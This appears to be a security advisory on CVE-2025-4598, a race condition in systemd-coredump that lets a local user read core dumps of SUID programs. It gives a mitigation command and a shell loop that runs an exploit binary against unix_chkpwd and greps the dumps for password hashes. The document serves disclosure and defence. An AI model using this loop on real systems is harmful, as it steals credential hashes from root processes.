Signal Handler Race Condition Affecting systemd/systemd package, versions [253-rc1,257.6)

Affected versions of this package are vulnerable to Signal Handler Race Condition due to a lack of protection in the grant_user_access() function, which decides whether a user should be allowed to read a core file or not. An attacker can crash a SUID program and gain read access to the resulting core dump by replacing it with a non-SUID process before it's analyzed by systemd-coredump. Furthermore, an attacker can crash root daemons that fork() and setuid() to the attacker's uid, and gain read access to the resulting core dumps and the root daemons' memory.

Note: This is only exploitable if the attacker has an unprivileged local account and can set up a way to win the race condition, which is limited by systemd-coredump's short initialization time.

This vulnerability can be mitigated by disabling the capability of the system to generate a core dump for SUID binaries. To perform that, the following command can be run as the root user: echo 0 > /proc/sys/fs/suid_dumpable While this mitigates this vulnerability while it's not possible to update the systemd package, it disables the capability of analyzing crashes for such binaries.

$ grep PRETTY_NAME= /etc/os-release
PRETTY_NAME="Fedora Linux 41 (Server Edition)"

$ id
uid=1001(evey) gid=1001(evey) groups=1001(evey) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ while true; do
    pid="$(printf 'whatever\0' | ./CVE-2025-4598 /usr/sbin/unix_chkpwd "$USER" nullok)";
    pidwait -f /usr/lib/systemd/systemd-coredump;
    if coredumpctl -1 dump "$pid" 2>/dev/null | strings -a | grep '\$[0-9A-Za-z]\+\$[0-9A-Za-z./]'; then
        break;
    fi;
done

• GitHub Commit
• GitHub PR
• Red Hat Bugzilla Bug
• Vulnerability Disclosure